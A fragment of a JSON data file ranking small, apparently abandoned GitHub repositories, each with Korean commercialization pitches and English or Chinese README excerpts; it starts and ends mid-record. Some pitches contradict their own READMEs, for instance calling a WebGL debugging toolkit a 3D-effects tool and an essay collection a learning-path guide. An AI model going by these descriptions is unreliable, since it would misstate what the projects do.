（[英文说明](https://docs.microsoft.com/en-us/microsoft-edge/extensions/guides/adding-and-removing-extensions)），加载已解压的扩展程序","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"Zzh-tju/DIoU","github_url":"https://github.com/Zzh-tju/DIoU","stars":6,"language":"MATLAB","license":"unknown","abandonment_months":29,"description":"# DIoU 저장소 분석\n\n## 왜 보물인가\n물체 감지 AI 모델의 정확도를 높이는 핵심 기술로, 자율주행차, 드론, 보안 카메라 등 현실의 수많은 제품에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 보안 카메라 영상에서 침입자를 자동 감지하는 클라우드 기반 보안 모니터링 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"<img src=\"CIoU.png\" width=\"800px\"/>\n\n## Complete-IoU Loss and Cluster-NMS for Improving Object Detection and Instance Segmentation. \n#### New released! https://github.com/Zzh-tju/CIoU    \nOur paper is accepted by **IEEE Transactions on Cybernetics (TCYB)**.\n\nThis is the code for our papers:\n - [Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression][[arxiv](https://arxiv.org/abs/1911.08287)] [[pdf](https://www.researchgate.net/publication/337386850_Distance-IoU_Loss_Faster_and_Better_Learning_for_Bounding_Box_Regression)]\n - [Enhancing Geometric Factors into Model Learning and Inference for Object Detection and Instance Segmentation](https://arxiv.org/abs/2005.03572)\n\n```\n@Inproceedings{zheng2020diou,\n  author    = {Zheng, Zhaohui and Wang, Ping and Liu, Wei and Li, Jinze and Ye, Rongguang and Ren, Dongwei},\n  title     = {Distance-IoU Loss: Faster and Better Learning for Bounding Box Regression},\n  booktitle = {The AAAI Conference on Artificial Intelligence (AAAI)},","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"cherryljr/LintCode","github_url":"https://github.com/cherryljr/LintCode","stars":5,"language":"Java","license":"unknown","abandonment_months":79,"description":"# LintCode 저장소 분석\n\n## 왜 보물인가\n프로그래밍 시험에 자주 나오는 문제들을 풀이 코드와 함께 정리한 학습 자료로, 개발자 취업 준비생들이 면접을 대비하는 데 필수적인 레퍼런스 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 취업 준비생과 입문자를 위한 구조화된 문제 풀이 강의 콘텐츠로 제공\n2. **기업 인","readme_excerpt":"# LintCode\n这记载了我的LintCode刷题历程以及对应各个题目的思路总结。\n如果你们有更好的解法，欢迎交流~~~\n","composite_score":0.3021,"license_safety_tag":"unknown"},{"name":"ruanyf/road","github_url":"https://github.com/ruanyf/road","stars":6,"language":"CSS","license":"unknown","abandonment_months":96,"description":"# ruanyf/road 상업화 분석\n\n## 왜 보물인가\n개발자들이 학습 경로를 체계적으로 설계할 수 있도록 도와주는 실용적인 가이드 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발자 커리어 로드맵 플랫폼으로, 사용자가 자신의 현재 수준을 입력하면 맞춤형 학습 경로를 추천해주는 웹 서비스\n2. **내부 업무 도구**: 개발사 H","readme_excerpt":"本书已经出版了，欢迎购买。\n\n> - [京东](http://search.jd.com/Search?keyword=%E5%89%8D%E6%96%B9%E7%9A%84%E8%B7%AF%20%E9%98%AE%E4%B8%80%E5%B3%B0&enc=utf-8&wq=%E5%89%8D%E6%96%B9%E7%9A%84%E8%B7%AF%20%E9%98%AE%E4%B8%80%E5%B3%B0)\n> - [淘宝](https://s.taobao.com/search?q=%E5%89%8D%E6%96%B9%E7%9A%84%E8%B7%AF+%E9%98%AE%E4%B8%80%E5%B3%B0)\n> - [亚马逊](https://www.amazon.cn/dp/B07DXRW8V6)\n> - [当当](http://product.dangdang.com/25300550.html)\n\n[![](docs/images/published_cover_sm.jpg)](./images/published_cover.jpg)\n\n2003年，我有了自己的博客，用来存放读书笔记，一直写到现在。\n\n这里收录的是2014年以前的文章，其中的一部分曾经出版过，当时的书名是《如何变得有思想》。2014年以后的文章，收录在另一本文集[《未来世界的幸存者》](https://ruanyf.github.io/survivor/)。\n\n这次重新编辑，替换了大部分文章，书名改成《前方的路》，出自德国作家黑塞的小说《德米安》，因为这些文字都是我寻找人生道路的记录。\n\n> “每个人的生活都是一条通向自身的道路。每个人的真正职责只有一个：找到自我。然后在心中坚守一生，全心全意，永不停息。\n>\n> 所有其它的路都是不完整的，是人的逃避方式，是对社会角色的懦弱伪装，是随波逐流，是对内心的恐惧。”\n\n\n","composite_score":0.302,"license_safety_tag":"unknown"},{"name":"3Dparallax/insight","github_url":"https://github.com/3Dparallax/insight","stars":5,"language":"JavaScript","license":"mit","abandonment_months":57,"description":"# 3Dparallax/insight 분석\n\n## 왜 보물인가\n웹사이트에 입체적인 3D 시각 효과를 간단하게 추가할 수 있는 도구로, 사용자에게 더욱 인상적이고 몰입감 있는 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고급 시각 효과가 필요한 웹 디자인 플랫폼(figma, Webflow 유사 서비스)의 기능으로 통합\n- **내","readme_excerpt":"_This project is **DEPRECATED** and no longer available on the Chrome Web Store._\n\n![WebGL Insight](http://i.imgur.com/Zb2PHLp.png)\n\n\n## About\n\nInsight is a WebGL debugging toolkit providing a variety of capabilities enabling more productive WebGL development and more efficient WebGL applications.\n\n\n## Features\n\n* Chrome Extension embedded in the Chrome DevTools panel    \n* Overdraw Inspector\n* Mipmap Inspector\n* Depth Inspector\n* Call Stack Timeline and Statistics\n* Program Usage Count\n* Duplicate Program Usage Detector\n* Program Viewer\n* Frame Control\n* State Variable Editor\n* Resource Viewer\n\n\n## Installation & Usage\n\nInstall Insight from the [Chrome Web Store](https://chrome.google.com/webstore/detail/webgl-insight/djdcbmfacaaocoomokenoalbomllhnko).\n\nWhen the extension is installed, open up the Chrome DevTools panel, click on the \"WebGL Insight\" tab, and browse to a WebGL application.\n\n\n### Overdraw Inspector\n\nDetects how how many times a pixel has been drawn. The color ranges from","composite_score":0.302,"license_safety_tag":"safe"},{"name":"fossasia/geolocation","github_url":"https://github.com/fossasia/geolocation","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":44,"description":"# fossasia/geolocation 보물 분석\n\n## 왜 보물인가\n사용자의 위치 정보를 빠르고 정확하게 파악할 수 있는 기술로, 지도 서비스부터 배송 추적까지 광범위한 산업에서 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 배송 추적 SaaS**\n- 이커머스 업체에게 실시간 배송 위치 추적 서비스를 월 구독으로 판매\n\n**2. 지역 기반 마케","readme_excerpt":"# Geolocation finder\r\nThis website is the official website of Fossasia when it comes to geolocations. It finds geolocation for integration in multiple projects \r\nthe community looks after. This is basically a mini-project of [FOSSASIA](https://fossasia.org/).\r\n\r\n![website look](./images/website-look.png)\r\n\r\n## Repositories currently using geolocation\r\n- [gci17.fossasia.org](https://github.com/fossasia/gci17.fossasia.org)\r\n- [gci18.fossasia.org](https://github.com/fossasia/gci18.fossasia.org)\r\n\r\n## How to use geolocation for other projects\r\nThe website currently supports only the [gci18.fossasia.org](https://github.com/fossasia/gci18.fossasia.org) repository where you can add the geo coordinates for mentors and students, the members of FOSSASIA are free to supply any further integrations, check the code in the <code>index.html</code> and do the needy.\r\n\r\n### How to get geolocation\r\n- visit [geolocation website](https://fossasia.github.io/geolocation/)\r\n- click \"Get my geolocation\" butto","composite_score":0.302,"license_safety_tag":"unknown"},{"name":"transitive-bullshit/react-modern-library-boilerplate","github_url":"https://github.com/transitive-bullshit/react-modern-library-boilerplate","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":71,"description":"# react-modern-library-boilerplate 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 기본 틀을 미리 만들어둔 것으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 웹 애플리케이션의 초기 개발 속도를 높이는 기본 틀 제공\n2. **내부 업무 도구**: 회사 직원들이","readme_excerpt":"# react-modern-library-boilerplate\n\n> Boilerplate and CLI [create-react-library](https://github.com/transitive-bullshit/create-react-library) for publishing modern React modules with Rollup and example usage via create-react-app.\n\n[![NPM](https://img.shields.io/npm/v/react-modern-library-boilerplate.svg)](https://www.npmjs.com/package/react-modern-library-boilerplate) [![JavaScript Style Guide](https://img.shields.io/badge/code_style-standard-brightgreen.svg)](https://standardjs.com)\n\n## Intro\n\n*Note*: Modern means modern as of March, 2018.. I'm sure everything will change in a month... :joy: :joy:\n\nWe strongly recommend that you use the accompanying CLI [create-react-library](https://github.com/transitive-bullshit/create-react-library) to create new modules based off of this boilerplate.\n\n**The purpose of this boilerplate is to make publishing your own React components as simple as possible.**\n\n## Features\n\n- Easy-to-use CLI [create-react-library](https://github.com/transitive-bullshi","composite_score":0.3019,"license_safety_tag":"unknown"},{"name":"hss01248/DialogUtil","github_url":"https://github.com/hss01248/DialogUtil","stars":11,"language":"Java","license":"apache-2.0","abandonment_months":24,"description":"# DialogUtil 사업화 분석\n\n## 왜 보물인가\n앱이나 웹사이트에서 사용자와 대화하는 창(팝업, 알림 등)을 쉽게 만들 수 있는 도구로, 개발자들이 반복적인 작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 시스템이나 전자상거래 플랫폼에서 사용자 확인 메시지, 경고창, 입력 양식 등을 빠르게 추가\n2. *","readme_excerpt":"\n\n\n# DialogUtil\ncommon used dialog with material style ( in support v7)，ios style，get top activity automatically,can invoke show() everywhere (any thread , any window)\n\n[![](https://jitpack.io/v/hss01248/DialogUtil.svg)](https://jitpack.io/#hss01248/DialogUtil)\n\n[中文ReadMe](README-ch.md)\n<br>\n[wiki](https://github.com/hss01248/DialogUtil/wiki)\n<br>\n<br>\nany problem or bug, join the qq group to get a quick response:\n<br>\n<br>\n<a target=\"_blank\" href=\"//shang.qq.com/wpa/qunwpa?idkey=76d7e8396ae225861d714b7f1bb976e1a06c8a76cc35c532c113e892b2d49ff0\"><img border=\"0\" src=\"http://pub.idqqimg.com/wpa/images/group.png\" alt=\"DialogUtil and Android\" title=\"DialogUtil and Android\"></a>\n\n# important points\n\n* if you do not invoke setActivity(activit), please  invoke show() after in or after the activity onResume,or it may show in previous activity!\n* about BadWindowTokenException,see the blog:[关于dialog,PopupWindow,SoftInputBoard的弹出时机的问题](http://www.jianshu.com/p/bd98cee2854b)\n* if some chinese phone","composite_score":0.3019,"license_safety_tag":"safe"},{"name":"Good-Old-Downloads/portal","github_url":"https://github.com/Good-Old-Downloads/portal","stars":5,"language":"CSS","license":"unknown","abandonment_months":91,"description":"# Good-Old-Downloads/portal 분석 보고서\n\n## 왜 보물인가\n오래되고 안정적인 다운로드 관리 시스템으로, 파일 배포가 필요한 많은 조직에서 바로 활용할 수 있는 완성된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 회사가 고객에게 최신 버전 파일을 자동으로 배포하는 다운로드 허브\n2. **내부 업무 ","readme_excerpt":"","composite_score":0.3019,"license_safety_tag":"unknown"},{"name":"motokimura/PyTorch_Gaussian_YOLOv3","github_url":"https://github.com/motokimura/PyTorch_Gaussian_YOLOv3","stars":7,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":52,"description":"# PyTorch_Gaussian_YOLOv3 분석 보고서\n\n## 왜 보물인가\n사진이나 영상에서 물체를 자동으로 찾아내는 AI 기술을 좀 더 정확하게 만든 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 카메라 SaaS**: 불법 침입자나 위험한 물체를 자동으로 감지하는 영상 모니터링 서비스\n2. **자동차 회사 내부 도구**: 자율주행 차량이 ","readme_excerpt":"# Gaussian YOLOv3 in PyTorch\nPyTorch implementation of [Gaussian YOLOv3](https://arxiv.org/abs/1904.04620)\n\n<p align=\"left\">\n  <img src=\"data/gaussian_yolov3/traffic_1_result.png\" height=\"260\"\\>\n  <img src=\"data/gaussian_yolov3/traffic_5_result.png\" height=\"260\"\\>\n  <img src=\"data/gaussian_yolov3/traffic_2_result.png\" height=\"260\"\\>\n</p>\n\n<p align=\"left\">\n  <img src=\"data/gaussian_yolov3/traffic_4_result.png\" height=\"265\"\\>\n  <img src=\"data/gaussian_yolov3/traffic_3_result.png\" height=\"265\"\\>\n</p>\n\n## Performance\n\nThe benchmark results below have been obtained by training models for 500k iterations on the COCO 2017 train dataset using darknet repo and our repo.\n\n**Gaussian YOLOv3 implemented in our repo achieved 30.4% in COCO AP[IoU=0.50:0.95]**, which is\n2.6 ~ 2.7 point higher than the score of YOLOv3 implemented in darknet and our repo.\n\nThis gain is smaller than 3.1, the one reported in the Gaussian YOLOv3 paper.\nThis may come from:\n- **absence of `sigma_const` parameter**: Gaussian","composite_score":0.3019,"license_safety_tag":"unknown"},{"name":"fossasia/searss","github_url":"https://github.com/fossasia/searss","stars":12,"language":"Python","license":"unknown","abandonment_months":86,"description":"# fossasia/searss 분석 보고서\n\n## 왜 보물인가\n뉴스, 블로그, 웹사이트 등 인터넷의 다양한 정보를 한곳에서 자동으로 모아주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 뉴스레터 자동 발송 플랫폼으로 운영하여 월정액 수익 창출\n2. **내부 업무 도구**: 대형 미디어사나 마케팅팀이 경쟁사 뉴스를 자동으로 ","readme_excerpt":"```\n _______  _______  _______  ______    _______  _______ \n|       ||       ||   _   ||    _ |  |       ||       |\n|  _____||    ___||  |_|  ||   | ||  |  _____||  _____|\n| |_____ |   |___ |       ||   |_||_ | |_____ | |_____ \n|_____  ||    ___||       ||    __  ||_____  ||_____  |\n _____| ||   |___ |   _   ||   |  | | _____| | _____| |\n|_______||_______||__| |__||___|  |_||_______||_______|\n\n```\n\n\n### Search To RSS Tool\n\n##### The goal of this mini-tool is to gather search results and store them as RSS feeds on a server.\n\n<img src=\"workflow.gif\" height=500px; />\n\n## Dependencies\n\n* [Python 2.x](https://www.python.org/download/releases/2.7/)\n* [Pip](https://pip.pypa.io/en/stable/installing/)\n* [Mechanize](http://wwwsearch.sourceforge.net/mechanize/)\n* [Feedgen](https://github.com/lkiesow/python-feedgen)\n* [BeautifulSoup4](https://www.crummy.com/software/BeautifulSoup/bs4/doc/)\n* [Requests](http://docs.python-requests.org/en/master/)\n\n## Installing\n\n1. Clone this repository `git clone ","composite_score":0.3019,"license_safety_tag":"unknown"},{"name":"getkuby/kuby-core","github_url":"https://github.com/getkuby/kuby-core","stars":8,"language":"Ruby","license":"MIT","abandonment_months":15,"description":"# Kuby-Core 상업화 분석\n\n## 왜 보물인가\n개발자들이 복잡한 배포 작업을 자동화할 수 있게 해주는 오픈소스 도구로, 기술 기업들의 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 Kuby-Core 기반 관리형 배포 플랫폼을 제공하여 중소 기업들의 자동 배포 수요 충족\n2. **내부 업무 도","readme_excerpt":"## Kuby\n\n![Unit Tests](https://github.com/getkuby/kuby-core/actions/workflows/unit_tests.yml/badge.svg?branch=master)\n![Integration Tests](https://github.com/getkuby/kuby-core/actions/workflows/integration_tests.yml/badge.svg?branch=master)\n\nDeploy your Rails app the easy way.\n\n## What is Kuby?\n\nAt its core, Kuby is a set of tools and smart defaults that encapsulate and codify years of established best-practices around deploying webapps, reducing the amount of time required to take your Rails project from an app that runs on your computer to an app that runs on the Internet.\n\nUnder the hood, Kuby leverages the power of Docker and Kubernetes. It tries to make these technologies accessible to the average Rails dev without requiring a devops black belt.\n\n## Why Kuby?\n\nKuby embraces the same convention-over-configuration approach that Rails does. It aims to reduce the cognitive overhead associated with learning a bunch of ops tools to get your app onto the internet. In other words, Kuby do","composite_score":0.3019,"license_safety_tag":"safe"},{"name":"szwacz/fs-jetpack","github_url":"https://github.com/szwacz/fs-jetpack","stars":5,"language":"TypeScript","license":"mit","abandonment_months":29,"description":"# fs-jetpack 상용화 분석\n\n## 왜 보물인가\n컴퓨터 파일을 다루는 모든 소프트웨어 개발자들이 필요로 하는 핵심 도구 모음으로, 반복적인 파일 작업을 자동화해 개발 속도를 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **파일 관리 SaaS 플랫폼**: 중소기업의 디지털 자산(사진, 문서, 영상) 정리 및 검색 서비스\n2. **개발자 ","readme_excerpt":"# fs-jetpack [![codecov](https://codecov.io/gh/szwacz/fs-jetpack/branch/master/graph/badge.svg)](https://codecov.io/gh/szwacz/fs-jetpack)\n\nAPI for your everyday file system manipulations, much more convenient than [fs](http://nodejs.org/api/fs.html) or [fs-extra](https://github.com/jprichardson/node-fs-extra). You will especially appreciate it as a scripting/tooling library and for your build pipelines.\n\n# Table of Contents\n\n[Key Concepts](#key-concepts)  \n[Getting Started](#getting-started)\n\n**API:**  \n[append](#appendpath-data-options)  \n[copy](#copyfrom-to-options)  \n[createReadStream](#createreadstreampath-options)  \n[createWriteStream](#createwritestreampath-options)  \n[cwd](#cwdpath)  \n[dir](#dirpath-criteria)  \n[exists](#existspath)  \n[file](#filepath-criteria)  \n[find](#findpath-searchoptions)  \n[inspect](#inspectpath-options)  \n[inspectTree](#inspecttreepath-options)  \n[list](#listpath)  \n[move](#movefrom-to-options)  \n[path](#pathparts)  \n[read](#readpath-returnas)  \n[remove]","composite_score":0.3019,"license_safety_tag":"safe"},{"name":"adi0x90/IoT-Pentesting-Methodology","github_url":"https://github.com/adi0x90/IoT-Pentesting-Methodology","stars":7,"language":"","license":"unknown","abandonment_months":92,"description":"# IoT-Pentesting-Methodology 분석\n\n## 왜 보물인가\n집에 있는 스마트폰, 스마트홈, 카메라 등 인터넷 연결 기기들의 보안 문제를 찾아내는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업의 IoT 기기 보안 진단을 자동으로 해주는 온라인 플랫폼\n- **내부 업무 도구**: 제조사나 통신사가 자사","readme_excerpt":"# IoT-Pentesting-Methodology\nResources to help get started with IoT Pentesting \n\n# Mindmap\n\nCovers step-by-step methodology to perform IoT pentesting \n(1st Draft) \n\n# Contributors \n\n* Aditya Gupta [adi1391](https://twitter.com/adi1391)\n* Eben Berry of MITRE \n\n# \n\nFeel free to contribute by opening an issue here or by reaching out through the [Contact page](https://www.attify-store.com/pages/contact-us)\n","composite_score":0.3019,"license_safety_tag":"unknown"},{"name":"sud0woodo/DCOMrade","github_url":"https://github.com/sud0woodo/DCOMrade","stars":9,"language":"PowerShell","license":"unknown","abandonment_months":91,"description":"# DCOMrade 보물지도\n\n## 왜 보물인가\nWindows 컴퓨터의 깊숙한 보안 기능을 테스트하고 점검할 수 있는 도구로, 기업의 시스템 안전성을 강화하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 IT 담당자가 월 구독으로 자사 Windows 시스템 보안을 자동으로 진단받는 클라우드 서비스\n- **내부 업무 도구**","readme_excerpt":"# DCOMrade\nDCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well. The script currently supports the following Windows operating systems (both x86 and x64):\n\n* Microsoft Windows 7\n* Microsoft Windows 10\n* Microsoft Windows Server 2012 / 2012 R2\n* Microsoft Windows Server 2016\n\n## Background\nI'm currently doing an internship at [HackDefense](https://hackdefense.com/), researching existing DCOM lateral movement techniques and trying to find a way to automate the enumeration of these (and possibly new techniques). The research resulted in the creation of this script and the accompanied research paper which is linked below.\n\n## How it works\nThe script was made based on the research done by Matt Nelson ([@enigma0x3](https://twitter.com/enigma0x3)), especially the [round 2](htt","composite_score":0.3018,"license_safety_tag":"unknown"},{"name":"fossasia/2014.fossasia.org","github_url":"https://github.com/fossasia/2014.fossasia.org","stars":10,"language":"HTML","license":"unknown","abandonment_months":69,"description":"# FOSSASIA 2014 컨퍼런스 웹사이트 분석\n\n## 왜 보물인가\n2014년 아시아 최대 규모 오픈소스 컨퍼런스의 공식 웹사이트로, 과거 행사 기록과 커뮤니티 아카이브로서의 역사적 가치를 지니고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **컨퍼런스 관리 SaaS**: 과거 행사 페이지 구조를 템플릿화하여 다른 기술 행사 주최자들에게 웹사이트 제작 서","readme_excerpt":"# FOSSASIA Summit 2014\n\nFOSSASIA 2014's Website for FOSSASIA Summit 2014\n\nhttps://2014.fossasia.org\n\n","composite_score":0.3018,"license_safety_tag":"unknown"},{"name":"franciscop/drive-db","github_url":"https://github.com/franciscop/drive-db","stars":5,"language":"JavaScript","license":"mit","abandonment_months":57,"description":"# drive-db 보물 지도\n\n## 왜 보물인가\n구글 드라이브를 간단한 데이터베이스처럼 사용할 수 있게 해주는 도구로, 복잡한 기술 없이도 정보를 정리하고 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 팀용 간편한 데이터 관리 웹사이트 (가입비 없이 구글 계정만으로 시작 가능)\n- **내부 업무 도구**: 회사 직원 ","readme_excerpt":"# drive-db [![npm install drive-db](https://img.shields.io/badge/npm%20install-drive--db-blue.svg)](https://www.npmjs.com/package/drive-db) [![test badge](https://github.com/franciscop/drive-db/workflows/tests/badge.svg)](https://github.com/franciscop/drive-db/blob/master/index.test.js) [![demo](https://img.shields.io/badge/demo-blue.svg)](https://jsfiddle.net/franciscop/1w4t7mc5/)\n\n> NOTICE: **Google has killed Google Sheets API v3 that allowed this library to exist**. So unfortunately this library no longer works. Their new API **does not** provide the same functionality and it doesn't allow you to publish a spreadshit, so we cannot do anything on our end.\n>\n> If you depended on this library for anything important, we are very sorry. The new Sheets v4 does work with you creating a whole backend-frontend OAuth workflow (which is what this library was designed to avoid), so please use other libraries out there that allow for this.\n>\n> Thank you so much everyone for using this library f","composite_score":0.3018,"license_safety_tag":"safe"},{"name":"seek-oss/seek-style-guide","github_url":"https://github.com/seek-oss/seek-style-guide","stars":7,"language":"JavaScript","license":"mit","abandonment_months":59,"description":"# seek-style-guide 평가 보고서\n\n## 왜 보물인가\n회사의 디자인 규칙을 한곳에 정리해서 모든 직원이 같은 스타일로 일할 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구인 플랫폼(Seek)을 이용하는 중소기업들에게 '우리 회사 브랜드 가이드 자동 생성 서비스'로 판매\n2. **내부 업무 도구**: 대기","readme_excerpt":"## ⚠️ NOTE: This project has been deprecated in favour of [Braid Design System.](https://github.com/seek-oss/braid-design-system)\n\n---\n\n[![Build Status](https://img.shields.io/travis/seek-oss/seek-style-guide/master.svg?style=flat-square)](http://travis-ci.org/seek-oss/seek-style-guide) [![npm](https://img.shields.io/npm/v/seek-style-guide.svg?style=flat-square)](https://www.npmjs.com/package/seek-style-guide) [![semantic-release](https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg?style=flat-square)](https://github.com/semantic-release/semantic-release) [![Commitizen friendly](https://img.shields.io/badge/commitizen-friendly-brightgreen.svg?style=flat-square)](http://commitizen.github.io/cz-cli/) [![Styled with Prettier](https://img.shields.io/badge/styled%20with-prettier-ff69b4.svg?style=flat-square)](https://github.com/prettier/prettier)\n\n# seek-style-guide\n\nLiving style guide for [SEEK](https://github.com/seek-oss), powered by [React](https://fa","composite_score":0.3018,"license_safety_tag":"safe"},{"name":"jhermann/awesome-python-talks","github_url":"https://github.com/jhermann/awesome-python-talks","stars":12,"language":"Shell","license":"cc0-1.0","abandonment_months":45,"description":"# awesome-python-talks 분석\n\n## 왜 보물인가\n파이썬 관련 고품질 강의 영상들을 한곳에 모은 학습 자료이므로, 파이썬을 배우고 싶은 사람들이 좋은 콘텐츠를 쉽게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **교육 플랫폼 (SaaS)**: 이 강의 목록을 구독형 온라인 교육 서비스에 통합하여 학생들에게 큐레이션된 파이썬 학습 경로 ","readme_excerpt":"# ![logo](https://raw.githubusercontent.com/jhermann/awesome-python-talks/master/static/logo.png) Awesome Python Talks\n\nAn opinionated list of awesome videos related to Python, with a focus on training and gaining hands-on experience.\n\n![CC0 licensed](http://img.shields.io/badge/license-CC0-red.svg)\n\n**Contents**\n\n* [Being Pythonic](#being-pythonic)\n* [The New Era](#the-new-era)\n* [Architecture &amp; Software Design](#architecture--software-design)\n* [Documentation](#documentation)\n* [Testing](#testing)\n* [Build Tools &amp; Automation](#build-tools--automation)\n* [Releasing &amp; Packaging](#releasing--packaging)\n* [DevOps with Python](#devops-with-python)\n* [Scientific Python](#scientific-python)\n* [Related Resources](#related-resources)\n* [Contributing](#contributing)\n\n\n## Being Pythonic\n\nWriting pythonic code in good style, and for humans…\n\n![❑](https://raw.githubusercontent.com/jhermann/awesome-python-talks/master/static/_thumbs/transforming-code.png)\n![❑](https://raw.githubusercon","composite_score":0.3018,"license_safety_tag":"unknown"},{"name":"wild-flame/mac-os-x-setup-guide","github_url":"https://github.com/wild-flame/mac-os-x-setup-guide","stars":7,"language":"HTML","license":"unknown","abandonment_months":83,"description":"# Mac OS X 설정 가이드 - 수익화 분석\n\n## 왜 보물인가\n새로운 맥 컴퓨터를 구입한 사람들이 복잡한 초기 설정을 쉽게 따라할 수 있도록 정리된 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 맥 신규 사용자를 위한 유료 온보딩 플랫폼 (비디오 튜토리얼, 자동 설정 도구 포함)\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# Mac OS X 配置指南 | Mac OS X Setup Guide\n\n<!-- Place this tag where you want the button to render. -->\n<a class=\"github-button\" href=\"https://github.com/wild-flame/mac-os-x-setup-guide/fork\" data-icon=\"octicon-repo-forked\" data-size=\"large\" data-show-count=\"true\" aria-label=\"Fork ntkme/github-buttons on GitHub\">Help edting this book</a>\n<br/>\n\nMac 的电脑很棒，可以称的上艺术品了。但是，对于绝大多数程序员来说，拿到一台新的 Mac 电脑，仍然需要对其进行一定的配置，才能使其进入最好的工作状态。这是一个不断的磨合的过程，最后这台电脑就会变成给你自己定制的一样。然而，一旦更换了电脑或者重新安装了系统后，再对电脑进行配置总是一件头疼的事情。如果直接使用新电脑就工作，会发现其实在工作的途中又要回头去做很多配置。\n\n本指南包含了大部分的通用软件的配置，也有部分针对特定的编程语言的配置。这里面配置适用于大部分的科研工作者/程序员/码农，也适用于有志于从事类似工作的学生。至于对于利用 Mac OS 来进行日常使用——即用来游戏，看书，浏览网页和视频的情况，大部分的系统默认的配置都已经足够。 \n\n<!-- 但本指南对于日常使用并非完全无用。尽管从整体上讲 Mac OS 的默认的设置已经相对合适了，但是仍有一些可以值得改进的细节，此种情况请酌情参考。 -->\n\n**本书中加 *（星号）的内容属于一些个人色彩很浓或是一些特殊的疑难情况的特殊说明，如果没有刚好相同的需求可以直接略过。** \n\n本配置指南创作的主要原则是简洁，对于同时包含多种安装方法的软件优先考虑使用 Homebrew 和命令行来进行安装，其次会选择官网的 dmg 或者 pkg文件，最后才会考虑 App Store，在配置上，尽量遵循最佳实践。但在某些时候，为了方便理解，仍会加入一些必要的说明。\n\n\n## 目录\n\n### 系统\n\n* [系统偏好设置](preference_and_se","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"fossasia/susper-backbone","github_url":"https://github.com/fossasia/susper-backbone","stars":8,"language":"HTML","license":"NOASSERTION","abandonment_months":93,"description":"# Susper-Backbone 저장소 분석\n\n## 왜 보물인가\n검색 엔진의 핵심 기능을 오픈소스로 제공하여 누구나 자체 검색 시스템을 만들 수 있는 기반을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 문서 검색 플랫폼을 구독 서비스로 제공하여 월 이용료를 받을 수 있습니다.\n2. **내부 업무 도구**: 기업의 방대한 데이","readme_excerpt":"# susper.com\n\nSusper is a decentral Search Engine that uses the peer to peer system yacy and Apache Solr to crawl and index search results.\n\n[![Build Status](https://travis-ci.org/fossasia/susper.com.svg?branch=gh-pages)](https://travis-ci.org/fossasia/susper.com?branch=gh-pages)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/2ba119419e7444b3b505bb37b4525deb)](https://www.codacy.com/app/shiven15094/susper-com?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/susper.com&amp;utm_campaign=Badge_Grade)\n[![Code Climate](https://codeclimate.com/github/fossasia/susper.com/badges/gpa.svg?branch=gh-pages)](https://codeclimate.com/github/fossasia/susper.com)\n[![codecov](https://codecov.io/gh/fossasia/susper.com/branch/gh-pages/graph/badge.svg)](https://codecov.io/gh/fossasia/gh-pages)\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susper.com?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n##Communicat","composite_score":0.3017,"license_safety_tag":"unknown"},{"name":"lvpangpang/cloud-music","github_url":"https://github.com/lvpangpang/cloud-music","stars":20,"language":"Vue","license":"unknown","abandonment_months":103,"description":"# cloud-music 저장소 분석\n\n## 왜 보물인가\n음악 스트리밍 서비스를 직접 만들 수 있는 기초 기술을 제공하는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n- **음악 스트리밍 앱**: 개인 음악 보관소나 팟캐스트 배포 플랫폼으로 운영\n- **기업 배경음악 서비스**: 카페, 병원, 매장용 커스텀 음악 재생 시스템 제공\n- **교육용 학습 플랫폼*","readme_excerpt":"# cloud-music\n迟到的网易云音乐\n\n项目视频展示\n<a href=\"https://pan.baidu.com/play/video#video/path=%2F2017.12.08-10.02.04.mp4&t=-1\">项目视频展示链接(更新版)</a>\n\n# 